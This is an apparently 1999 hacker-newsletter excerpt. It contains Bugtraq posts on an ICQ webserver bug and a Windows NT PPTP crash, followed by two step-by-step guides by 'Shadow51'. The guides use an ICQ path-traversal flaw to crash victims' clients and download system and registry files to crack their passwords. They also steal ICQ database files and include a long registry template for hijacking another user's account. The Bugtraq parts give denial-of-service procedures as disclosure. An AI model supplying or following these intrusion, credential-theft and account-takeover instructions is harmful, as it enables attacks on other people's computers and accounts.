>could not reproduce the error. I've used ICQ Version 99a Beta v.2.13 Build
>1700. It would be beneficial if Ron Jarrell or Jan Vogelgesang, explained
>the procedure that they carried out to arrive to the error detailedly.
>
>Best regards, Jose.
I tested it against my own win98 box with IE5 final (english) result: I was
vulnerable.
My friend with win98 and ie4 (french) result: vulnerable
An other friend with win98 and IE5 (french) result: vulnerable
we were all using ICQ99a build 1700
Method used:
telnet to port 80
send: QUIT <LF>
it disconnects after 5 to 10 seconds.
,
|
| Kaven Rousseau
| rousseau@globetrotter.qc.ca
| FingerPrint: F1C8 F915 9F0F DD5E DACB 024B 5C6F 163D F097 40D6
`------------------- ---- -- -
-------------------------------------------------------------------------------
Date: Sat, 10 Apr 1999 20:45:56 +0200
From: Frank Dekervel <kervel@SVENNIEBOY.TERBANK.KOTNET.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: ICQ Webserver bug
humm,
i d like to add one last thing to this according to me much too long
thread. (seems some writers ain't thinking about the cause)
if you have a look at the pseudocode below, which i suspect mirabilis to
use, you ll find thousands of ways to exploit icq.
fread(my_socket,"%s %s %s", getword, url, httpversion);
/// if you only feed two or one word, it 'dumps core', gpf under windoze
change the slashes in url to backslashes;
url = "c:\program files\icq\webroot_dir\" + url;
/// yes, this is the '../../../../' bug ...
open(fd,url);
read(fd,buffer);
write(socket,buffer);
close(socket);
i think its this because i made small webserver earlier to see common
bugs. i checked on the net, and the dynamic server of francois piete
(known for delphi components) and various shareware servers, or remote
admin modules for eg. proxy servers are vulnerable.
greetz,
kervel
(kervel@svennieboy.terbank.kotnet.org)
----------------------------------------------------------------------------
@HWA
12.1 ICQ Homepage Exploit
~~~~~~~~~~~~~~~~~~~~
ICQ Homepage Exploit
By Shadow51
Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means
they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely,
and even download their files. The only problem is that you can't see the files, so you have to know what you're
downloading.
To close the ICQ client:
1. Click on the start button
2. Click on RUN
3. Type Telnet 123.123.123.123 80 Of course replace the 123.123.123.123 by the IP of the victim (note that this bug
only works on build 1700 and maybe a few others but I'm not sure).
4. Press ENTER Wait until it connects
5. Type QUIT Wait about 10 seconds. If they go offline that means it worked, if not, then it didn't work. Now suppose
you want to get some of their files.
Lets say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on:
1. Go to your browser
2. Type http://123.123.123.123/.html/......../windows/win.ini
note that you need the /.html/ part. It will trick the server into believing it's a html file, and note that there are 8 dots
/......../ (that means it goes back 4 dirs if the users ICQ dir is not in a standard place. It can cause problems, but 95% of
the time it's in c:\progra~1\icq\
3. press ENTER in your browser
It will simply ask you where you want to save the file the you save it and do what ever you want with it. Now this is not all
you can do. There are much better things with this exploit, like getting the user's password files and registry. If you are a
lamer, I suggest you go and play with what you just learned, and stop reading now cause this is a bit too complicated for
you :P. Okay, so you want to have the registry and all the passes. Okay, before you do this, I warn you that if the user
your hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose
you have Win98, and they have win95, and it wont work. An easy way to make sure it's the same version is to download
their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this
is a good one.
1. Get 2 files http://123.123.123.123/.html/......../windows/user.dat and
http://123.123.123.123/.html/......../windows/system.dat
Remember to change the IP when your done.
2. Copy them in a directory.
3. Make a backup copy of you c:\windows\user.dat and c:\windows\system.dat You're gonna want to have them back
when you're done.
4. Restart your computer
5. Press F8 just before it boots up
6. Choose "Command Prompt Only"
7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked
8. Reboot your computer
9. Just before it boots, press F8 several times; choose safe mode.
10. Once booted in safe mode, click on start
11. Click on RUN
12. Type regedit
13. Press ENTER
14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..."
15. Save the file, then get yourself a Password Cracker
16. If all goes well, you now have all the users passwords.
It should look something like this:
crypt_Blizzard_Storm : A@N
www.mircosoft.com : Administration:PASSWORD
*Rna\Dan\dannyk : q34ad6gt
*Rna\Test\957935 : nar8s7yj
*Rna\Test2\wolves : cyal8r
*Rna\Test3\curtisph : q73vnrht
*Rna\My Connection\USERNAME : PASSWORD
*Rna\My Connection 3\USERNAME : PASSWORD
17. Reboot
18. Press F8 at startup
19. Choose "Command Prompt Only"
20. Replace user.dat and system.dat with your originals that you previously had backed up
Shadow51
29000000
Shadow51@writeme.com
-----------------------------------------------------------------------------------------------------------------------
ICQ Account Cracking
By Shadow51
A lot of people have been asking me how it would be possible to crack ICQ accounts. It's very easy, but unfortunately it
doesn't work every time. All you do is put in this:
1. Download the following files from the targeted users hard drive using the ICQ exploit:
(replace 123.123.123.123 by the guys IP and UIN by the guys ICQ #)
(note that there's 6 dots not 8)
http://123.123.123.123/.html/....../db/UIN.idx
http://123.123.123.123/.html/....../db/UIN.dat
http://123.123.123.123/.html/....../db/UINmsg.dat
http://123.123.123.123/.html/....../db/UINmsg.idx
http://123.123.123.123/.html/....../db/UINhis.idx
http://123.123.123.123/.html/....../db/UINhis.dat
2. Open Notepad and create a new document.
3. Copy this into it. (Replace all the HACKEDUIN by the UIN you're hacking)
(I got this registry key from http://i.am/devil)
REGEDIT4
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN]
"Name"="Hacked UIN"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs]
"Random Groups Version"=dword:0000000a
"Online Color"=dword:00ff0000
"Unlisted Color"=dword:00800000
"Offline Color"=dword:000000ff
"Authorize Color"=dword:00400080
"Notify Color"=dword:00800080
"LastStatus Color"=dword:00008000
"Default File Dir"="C:\\Program Files\\ICQ\\Received Files"
"SMTP Address"=""
"DND Message"="Please do not disturb me now. Disturb me later."
"Out Message"=""
"Busy Message"="User is occupied. Only urgent messages will be delivered."
"Chat Message"="I would like to chat about anything"
"Away PreNum"=dword:00000000
"Out PreNum"=dword:00000000
"Busy PreNum"=dword:00000000
"DND PreNum"=dword:00000000
"Chat PreNum"=dword:00000000
"File Options"=dword:00000004
"URL Options"=dword:00000004
"Chat Options"=dword:00000004
"All Options"=dword:0000000e
"EXT Options"=dword:00000004
"Startup"="No"
"Auto Away"="No"
"Auto Hide Time"=dword:0000001e
"Auto Hide"="No"
"Move Server Top"="No"
"Blink In Tray"="No"
"Sort Lists"="Yes"
"Show Online List"="No"
"Remove AddFriend"="Yes"
"Splash Open"="Yes"
"History Last First"="Yes"
"FloatTop"="Yes"
"Thru Server"="No"
"Join Chat"="No"
"Open URL Browser"="No"
"Refuse File NotInList"="No"
"Overwrite ExistFile"="No"
"Disable Online Alert"="Yes"
"Accept Urgent In Busy"="No"
"Blink Tray In AwayBusy"="Yes"
"Use Contact List Color"="No"
"Contact List Color"=dword:00c8b99d
"Save User File"="Yes"
"Auto Update"="Yes"
"Search Wizard"="No"
"Default Mailer"="Yes"
"Pop Play Sound"="Yes"
"Pop Auto Launch"="No"
"Pop Check"="No"
"Pop Time"=dword:0000000a
"Check Headers"="Yes"
"MoveToOutDelay"=dword:00000014
"MoveToOut"="No"
"MoveToAwayDelay"=dword:0000000a
"MoveToAway"="No"
"Auto Sleep Mode"="No"
"Log History Events"="Yes"
"Connection Type"="Permanent"
"Firewall"="Yes"
"UseGivenIP"="No"
"Socks"="No"
"SocksPort"=dword:00000438
"SocksServer"="Enter your socks server"
"ProxySocks4Host"="Enter your proxy server"
"ProxySocks4Port"=dword:00000438
"UseProxySocks4"="No"
"GiveStats"="No"
"SocksVersion"=dword:00000004
"SocksAuthentication"=dword:00000000
"FirewallTimeout"=dword:0000001e
"UseFirewallTimeout"="No"
"UseFirewallRangePorts"="Yes"
"FirewallFromPort"=dword:000059d8
"FirewallToPort"=dword:00007148
"Old Sockets"="No"
"UserType"=dword:00000000
"Mail Receipients"=";"
"Random Available"="No"
"RandomGroupName"=dword:00000001
"Random Name"="#¥d¶³ 666 £["
"Allow Secure Clients Only"="Yes"
"PhoneApproval"="Yes"
"PhoneToneTime"=dword:00000032
"PhonePauseTime"=dword:000001f4
"PhoneBreakTime"=dword:00000028
"PhoneSettings"=dword:00000001
"PhonePauseChar"=","
"PhoneLocalP"=" "
"PhoneLongP"=" "
"PhoneInterP"=" "
"Chat RoomName"="Product Support / Suggestion"
"Auto Join Chat Room"="Yes"
"Novice Counter"=dword:0000000a
"Menu Counter"=dword:00000013
"Servers Version"=dword:00000001
"Externals Version"=dword:00000019
"Stats"=hex:60,ff,ea,52,5c,36,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
"Novice"="No"
"Dropped Users"=hex:01,00,00,00,43,ca,35,00,e6,02,1f,00
"State Flags"=dword:00000000
"Server Msg Version"=dword:0000000b
"Server Msg Shown"=dword:00000001
"Server Msg Count"=dword:00000009
"LeftButton Warning"="No"
"Menu Left Click"="No"
"Tip Startup"="No"
"Tip Position"=dword:00000000
"MoreEvents Warning"="No"
"Invisible Warning"="No"
"Send Later Warning Off"="No"
"Busy Warning"="No"
"Away Warning"="No"
"DND Warning"="No"
"FT Warning"="No"
"Ext Warning"="No"
"Out Warning"="No"
"Chat Warning"="No"
"Away Message"="User is currently away\r\nYou can leave him/her a message"
"Random Comment"="You won't be hurt by things you don't care.\r\n\r\n(c) Calvin's Labs, 1993-1998. No Rights
Reserved.\r\nIt's not a secret. It's not a magic. It's not a myth."
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\YOURUIN\Prefs\Presets]
"OutMsg Presets 0"="I'm out'a here. See you tomorrow!"
"DNDMsg Presets 0"="Please do not disturb me now. Disturb me later."
"Away PresetsMsg 0"="Away"
"Out PresetsMsg 0"="Out for the day"
"Busy PresetsMsg 0"="Busy"
"DND PresetsMsg 0"="DND"
"Chat PresetsMsg 0"="Chat"
"AwayMsg Presets 1"="I am out to lunch. I will return shortly."
"OutMsg Presets 1"=""
"DNDMsg Presets 1"="I am currently in a meeting. I can't be disturbed."
"ChatMsg Presets 1"="Come Join my chat room!"
"Away PresetsMsg 1"="Lunch"
"Out PresetsMsg 1"="Not here"
"Busy PresetsMsg 1"="Meeting"
"DND PresetsMsg 1"="Meeting"
"Chat PresetsMsg 1"="Come In"
"AwayMsg Presets 2"="Don't go anywhere! I'll be back in a jiffy!"
"OutMsg Presets 2"="I'm closed for the weekend/holidays."
"DNDMsg Presets 2"="Don't disturb my concentration!"
"ChatMsg Presets 2"="Don't miss out on the fun! Join our chat!"
"Away PresetsMsg 2"="Be right back"
"Out PresetsMsg 2"="Closed"
"Busy PresetsMsg 2"="Concentration"
"DND PresetsMsg 2"="Concentration"
"Chat PresetsMsg 2"="Fun"
"AwayMsg Presets 3"="I'm out with the dog. Be back when he's finished."
"OutMsg Presets 3"="Gone fishin'."
"DNDMsg Presets 3"="I'm on the phone with a very important client. Don't disturb me!"
"ChatMsg Presets 3"="What are you waiting for? Come on in!"
"Away PresetsMsg 3"="Dog Walk"
"Out PresetsMsg 3"="Fishing"
"Busy PresetsMsg 3"="On the Phone"
"DND PresetsMsg 3"="On the Phone"
"Chat PresetsMsg 3"="Don't Wait"
"AwayMsg Presets 4"="Went out for a smoke. "
"OutMsg Presets 4"="I'm sleeping. Don't wake me."
"DNDMsg Presets 4"="I can't chat with you now. I'm busy."
"ChatMsg Presets 4"="We'd love to hear what you have to say. Join our chat."
"Away PresetsMsg 4"="Smoke"
"Out PresetsMsg 4"="Sleeping"
"Busy PresetsMsg 4"="Can't chat "
"DND PresetsMsg 4"="Can't chat "
"Chat PresetsMsg 4"="Hear"
"AwayMsg Presets 5"="On my Coffee break."
"OutMsg Presets 5"="Went home. Had to feed the kids."
"DNDMsg Presets 5"="Can't you see I'm working?"
"ChatMsg Presets 5"="Enter your chat room message here"
"Away PresetsMsg 5"="Coffee"
"Out PresetsMsg 5"="Kids"
"Busy PresetsMsg 5"="Working"
"DND PresetsMsg 5"="Working"
"Chat PresetsMsg 5"="Empty"
"AwayMsg Presets 6"="Went to get some fresh air."
"OutMsg Presets 6"="Gone for good."
"DNDMsg Presets 6"="Enter your occupied message here"
"ChatMsg Presets 6"="Enter your chat room message here"
"Away PresetsMsg 6"="Air"
"Out PresetsMsg 6"="Gone"
"Busy PresetsMsg 6"="Conversing"
"DND PresetsMsg 6"="Empty"
"Chat PresetsMsg 6"="Empty"
"BusyMsg Presets 7"="User is occupied. Only urgent messages will be delivered."
"DNDMsg Presets 7"="Enter your occupied message here"
"ChatMsg Presets 7"="Enter your chat room message here"
"Away PresetsMsg 7"="Empty"
"Out PresetsMsg 7"="Empty"
"Busy PresetsMsg 7"="Empty"
"DND PresetsMsg 7"="Empty"
"Chat PresetsMsg 7"="Empty"
"BusyMsg Presets 0"="User is currently Occupied"
"ChatMsg Presets 0"="I would like to chat about anything"
"BusyMsg Presets 1"="User is currently Occupied1"
"BusyMsg Presets 2"="User is currently Occupied2"
"BusyMsg Presets 3"="User is currently Occupied"
"BusyMsg Presets 4"="User is currently Occupied"
"BusyMsg Presets 5"="User is currently Occupied"
"BusyMsg Presets 6"="User is currently Occupied"
"AwayMsg Presets 7"="User is currently away"
"OutMsg Presets 7"="User is currently N/A"
"AwayMsg Presets 0"="User is currently away\r\nYou can leave him/her a message"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message0]
"Message"="Please bookmark our network status page."
"URLName"="http://www.mirabilis.com/status.html"
"URL"="press here"
"Date"=""
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message1]
"URLName"="http://www.mirabilis.com/emailsig.html"
"URL"="Go to the ICQ e-mail signature generator"
"Date"=""
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message2]
"Message"="ICQ is doing it again! One more new service from ICQ for your pleasure! Create your ICQ interest group -
home, work, family, hobby, affiliation, sports, music...etc..( It's straight forward, no HTML needed! )"
"URLName"="http://www.icq.com/announcements/02.html"
"URL"="It's fun and easy, GO!!"
"Date"="31-MAR-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message3]
"URLName"="http://www.icq.com/announcements/whitepages.html"
"URL"="Go!"
"Date"="1-APR-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message4]
"Message"="ICQ can notify you when you receive an e-mail and show you the e-mail headers! Learn how to do it!"
"URLName"="http://www.mirabilis.com/email.html"
"URL"="E-mail notification instructions"
"Date"="15-JUN-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5]
"URLName"="http://www.icq.com/announcements/05.html"
"URL"="Create your Greeting"
"Date"="12-JUL-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6]
"URLName"="http://www.icq.com/announcements/06.html"
"URL"="Click For More Information"
"Date"="26-AUG-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7]
"Message"="ICQ can alert you when you receive Emails and show you the Email headers!"
"URLName"="http://www.icq.com/announcements/07.html"
"URL"="Learn how to do it"
"Date"="06-SEPT-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8]
"URLName"="http://www.icq.com/announcements/06.html"
"URL"="Click For More Information"
"Date"="20-OCT-98"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup1]
"Name"="General Chat"
"Number"=dword:00000001
"Version"=dword:00000001
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup2]
"Name"="Romance"
"Number"=dword:00000002
"Version"=dword:00000002
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup3]
"Name"="Games"
"Number"=dword:00000003
"Version"=dword:00000003
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup4]
"Name"="Students"
"Number"=dword:00000004
"Version"=dword:00000004
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup5]
"Name"="20 Something"
"Number"=dword:00000006
"Version"=dword:00000006
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup6]
"Name"="30 Something"
"Number"=dword:00000007
"Version"=dword:00000007
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup7]
"Name"="40 Something"
"Number"=dword:00000008
"Version"=dword:00000008
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup8]
"Name"="50 Plus"
"Number"=dword:00000009
"Version"=dword:00000009
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1]
"Host"="icq1.mirabilis.com"
"Port"=dword:00000fa0
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canasta]
"Type"="Command"
"Command Line"="/ip:"
"Path"="C:\\Program Files\\Canasta\\Canasta.exe"
"URL"="http://ourworld.compuserve.com/homepages/mharte"
"Version"=dword:0000000f
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Connectix VideoPhone]
"Type"="Extension"
"Format"="/p:tcp /ac:"
"Extension"="cvp"
"URL"="http://www.connectix.com/html/videophone.html"
"Version"=dword:00000009
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Seeme]
"Type"="Command"
"Command Line"=""
"Path"="C:\\CUSEEME\\CUSEEM32.EXE"
"URL"="http://www.cu-seeme.com/"
"Version"=dword:00000006
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone]
"Type"="Extension"
"Format"=""
"Extension"="iru"
"URL"="http://irisphone.com/"
"Version"=dword:0000000a
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat]
"Type"="ServerExtension"
"Format"="1.1\\n-u 1 -a "
"Extension"="vce"
"NumParameters"=dword:00000002
"Server1"="vchat1.microsoft.com"
"URL"="http://vchat1.microsoft.com"
"Version"=dword:00000011
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param1]
"ParamName"="World"
"CanOtherChange"="No"
"Param1"="#Compass"
"Param2"="#BugWorld"
"Param3"="#Fishbowl"
"Param4"="#Lodge"
"Param5"="#Lunar"
"Param6"="#Lodge"
"Param7"="#Practice"
"Param8"="#RedDen"
"Param9"="#TableTop"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param2]
"ParamName"="Avatar"
"CanOtherChange"="Yes"
"Param1"="Amani"
"Param2"="Anderson"
"Param3"="Brb"
"Param4"="Cat"
"Param5"="Crab"
"Param6"="Dancer"
"Param7"="Dred"
"Param8"="Duggan"
"Param9"="Joey"
"Param10"="Lulu"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netscape CoolTalk]
"Type"="Command"
"Command Line"=""
"Path"="C:\\Program Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE"
"URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.html"
"Version"=dword:00000004
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikken on the Rockx]
"Type"="ClientServer"
"Client Command Line"="/CLIENT %i"
"Server Command Line"="/SERVER"
"Client Path"="C:\\Rikken\\Rikken.exe"
"Server Path"="C:\\Rikken\\Rikken.exe"
"URL"="http://www.dse.nl/~ramon/rikken/"
"Version"=dword:00000017
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPhone]
"Type"="Extension"
"Format"="callto://"
"Extension"="vdp"
"URL"="http://www.vdo.net/download/"
"Version"=dword:00000003
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCall]
"Type"="Command"
"Command Line"=""
"Path"="C:\\VidCall\\Corp.EXE"
"URL"="http://www.access.digex.net/~vidcall/vidcall.html"
"Version"=dword:00000008
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPhone]
"Type"="Extension"
"Format"=""
"Extension"="wpc"
"URL"="http://www.webphone.com/"
"Version"=dword:00000007
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake]
"Type"="ClientServer"
"Client Command Line"="-mpath +connect %i"
"Server Command Line"="-mpath -listen"
"Client Path"="c:\\quake_sw\\Q95.bat"
"Server Path"="c:\\quake_sw\\Q95.bat"
"Server1"="quake.xmisson.com"
"URL"="http://www.idsoftware.com"
"Version"=dword:00000010
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat]
"Type"="ServerCommand"
"Format"="GROUPNAME=i PORT=15000"
"Path"="C:\\Program Files\\VoxChat\\VoxChat.exe"
"NumParameters"=dword:00000001
"Server1"="voxchat1.voxware.com"
"Server2"="voxcha2.voxware.com"
"URL"="http://www.voxchat.com/low/download.htm"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat\Param1]
"ParamName"="Room"
"CanOtherChange"="No"
"Param1"="#ICQ"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations]
"LastUpdate"=dword:00000000
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main]
"SelectedCell"=dword:00000000
"AlwaysOnTop"="Yes"
"LeftBarWidth"=dword:000000ad
"RightBarWidth"=dword:000000ad
"FloatBar-Left"=dword:00000255
"FloatBar-Right"=dword:00000307
"FloatBar-Top"=dword:00000033
"FloatBar-Bottom"=dword:000001f3
"State"="Floating"
"Minimized"="No"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows]
"Response"=dword:008f00c9
"SearchWiz"=dword:006f00c0
"NotifyWiz"=dword:006f00c0
"posNovice"=dword:009300dc
"posMOTD"=dword:00af00b7
"posMenuConfig"=dword:00a900e7
"RemoveUIN"=dword:00bb0108
"Message"=dword:008b004f
"Security"=dword:007400b4
"Prefs"=dword:007f00ae
"History"=dword:0096003a
"File Request"=dword:009000f0
"FileTransfer"=dword:009700ae
"Info"=dword:009300d2
"FetchUser"=dword:00e9010e
"URL Message"=dword:00a00069
"Away"=dword:00bd00f7
"Chat Request"=dword:009f00dd
"Contacts List"=dword:008300bd
"Chat"=dword:008b00f5
"Phone"=dword:000a000a
"Phone Call Request"=dword:007700e5
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search]
"Place"=dword:00a400cc
"Type"=dword:00000002
"Width"=dword:01880188
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat]
"ChatStyle Counter"=dword:00000003
"Pen Color"=dword:0080ffff
"Back Color"=dword:00004000
"Send Focus"="Yes"
"Enable Sounds"="Yes"
"Name Bars"="Yes"
"Always On Top"="No"
"AutoColor"="No"
"OverRide Format"="Yes"
"Show Toolbar"="Yes"
"State"=dword:00010000
"New Font Name"="Times New Roman"
"Char Set"=dword:00000000
"IRCListWidth"=dword:00000006
"Font Pitch"=dword:00000012
"New Font Height"=dword:0000000e
"Font Effects"=dword:00000000
"AutoColor 0"=dword:00000000
"AutoColor 1"=dword:00000080
"AutoColor 2"=dword:00008000
"AutoColor 3"=dword:00008080
"AutoColor 4"=dword:00800000
"AutoColor 5"=dword:00800080
"AutoColor 6"=dword:00808000
"AutoColor 7"=dword:00808080
"AutoColor 8"=dword:00c0c0c0
"AutoColor 9"=dword:000000ff
"AutoColor 10"=dword:0000ff00
"AutoColor 11"=dword:0000ffff
"AutoColor 12"=dword:00ff0000
"AutoColor 13"=dword:00ff00ff
"AutoColor 14"=dword:00ffff00
"AutoColor 15"=dword:00ffffff
"Place-Left"=dword:0000000a
"Place-Right"=dword:000001fe
"Place-Top"=dword:0000000a
"Place-Bottom"=dword:0000021a
"New LogFile name"="ICQChatLog.txt"
"New SaveFile name"="ICQChatSave.txt"
4. Save the file as HACKEDICQ.REG
5. If you have ICQ open, close it.
6. Copy all the files you got earlier (the idx and dat files) into your ICQ\DB directory
ex: c:\progra~1\ICQ\db
7. Open the HACKEDICQ.REG file
8. When it asks if you would like to add this to your registry, click YES.
9. Open the DB convert program in your ICQ directory (It comes with ICQ99), then click on "Convert a old DB"
10. When it's done converting, close the DB converter. It should start ICQ automatically, but if it doesn't, open it
manually.
11. If ICQ doesn't already start in the Hacked UIN, click on the ICQ menu, click on "Add/Change Current User", then
click on "Change the Active User". Choose Hacked UIN. If it asks for the password, there's 2 things that may have
happened:
I. They have the protection set on high. The only way of getting past the protection is to download the ICQ CRACK.
II. They are sill online. The only thing you can do is wait until they go offline.
12. Once you are successfully in the users ICQ, quickly change the users password. Once this is complete, you will be in
total control over the users ICQ account. Mission success.
ICQ Exploit Tips
-----------------
Remember in the last text I wrote? I told you to download the command.com. There's a better way to find out the
Windows version, and more info with it, too. Get the file http://123.123.123.123/.html/......../msdos.sys.
I saw in the original ICQ Exploit text that the HTTP server Exploit doesn't work on NT, so i went in NT and i tested it.
The result was system wasn't exploitable. Hence, if you are running NT, and you want to use the HTTP server; it's 100%
safe for you to do so.
Shadow51
29000000
Shadow51@hackcity.com
@HWA
13.0 Possible DoS in WinNT RAS (PPTP)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Possible DOS in WinNT RAS (PPTP)
Simon Helson (simon@CONCEPTS.CO.NZ)
Tue, 27 Apr 1999 09:29:06 -0700
Please excuse if this has been posted before, I did a quick search of the
archives and found nothing
This hasn't been sent to MS, as I don't know an email address to send it
to, Aleph, if you find it worthy of sending, please forward a copy to the
MS people for their attention. Cheers.
I was playing around with PPTP last night, and discovered that, with "very"
minimal effort, I could cause my friends NT Server (version 4, service pack
4) to reboot instantly, without shutting down. All I did was telnet to the
port (1723) on the NT box, and then send the following data.
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
hhhhhhhhhhhhhhhhhhhhhhhhhhhh (that's 256 'h's for those who don't want to
count :-)
and hit return. nothing. BUT, then I hit ^D and all hell broke loose. The
NT server dropped like a stone, full hardware reboot.
I tested this multiple times and always got the same response.
The NT Server was version 4, with Service pack 4 applied.
Cheers
Simon
------------------------------------------------------------------------------
Date: Tue, 27 Apr 1999 20:55:50 -0700
From: Simon Helson <simon@CONCEPTS.CO.NZ>
To: BUGTRAQ@netspace.org
Subject: RE Possible DOS in WinNT RAS (PPTP)
Hello again.
please excuse the lack of detail in my first posting. I was trying to
recollect the events of the past evening.
Unfortunately I don't have unlimited access to a NT server to play with.
However, I have tried this again (on the same server) this time over the
internet as opposed to a LAN. (trying to remove the NIC from the equation.)
Firstly, the NT setup:
NT Server Version 4, with Service Pack 4.0 applied.
(outside US version - only 40 bit)
PPTP added as a network device
Number of VPNs available - 2
then RAS service started.
The attack box setup:
RedHat Linux 5.2 running kernel 2.2.1
modem connection to the net
The procedure I followed:
[root@blobby /root]# telnet <removed for privacy> 1723
Trying <removed for privacy>...
Connected to <removed for privacy>.
Escape character is '^]'
hhhhhhhhhhhhhhh<type 256 times>
^d (not shown in output)
^]
telnet> close
Connection closed.
